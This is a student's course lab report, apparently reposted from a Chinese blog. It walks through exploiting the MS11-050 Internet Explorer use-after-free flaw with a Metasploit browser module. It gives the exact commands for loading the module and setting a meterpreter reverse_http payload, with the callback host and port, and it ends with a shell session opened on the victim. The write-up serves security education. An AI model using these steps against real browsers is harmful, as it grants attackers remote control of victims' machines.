zoukankan      html  css  js  c++  java
  • 20145335郝昊《网络攻防》Exp4 MS11_050

    20145335郝昊《网络攻防》Exp4 MS11_050

    实验内容

    • 初步掌握平台matesploit的使用

    • 了解漏洞MS11_050漏洞:use-after-free漏洞,即对象被释放之后,对应指针并没有被置为NULL,被释放的内存中的数据可能会被其他对象的函数非法调用

    • 影响范围:IE7 和IE 8 其他的版本好像并不存在这个漏洞。

    实验步骤

    • 使用命令msfconsole命令进入控制台

    • 使用命令search ms11_050查看针对MS11_050漏洞的攻击模块

    • 确定相应模块名之后,我们使用该模块。使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement进入模块

    • 使用命令info查看该模块的具体信息(可见其可用范围,针对浏览器IE 7,IE 8可用,其中又分该目标机是否开启了DEP数据保护)

    • 之后需要设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。使用命令set payloads windows/meterpreter/reverse_http

    • 并使用show optoions 查看具体参数设置。

    • 并进行设置其相关参数。(命令如下)

        set LHOST 192.168.199.129 
        set LPORT 5335
        set URIPATH 20145335HH
      
    • 之后使用命令exploit攻击,等待连接,漏洞主机访问该ip,ie浏览器发生溢出,此时,攻击端显示创建了一个ID为1的会话(session)

  • 相关阅读:
    【python cookbook学习笔记】给字典增加一个条目
    UI设计星级评价
    弱引用和循环引用
    lua数据类型
    lua虚拟机笔记
    c++对象模型笔记
    使树控件方向键无效
    实现CListCtrl自定义行高
    创建对话框时常用配置
    C++格式化输出总结
  • 原文地址:https://www.cnblogs.com/20145335hh/p/6698667.html
Copyright © 2011-2022 走看看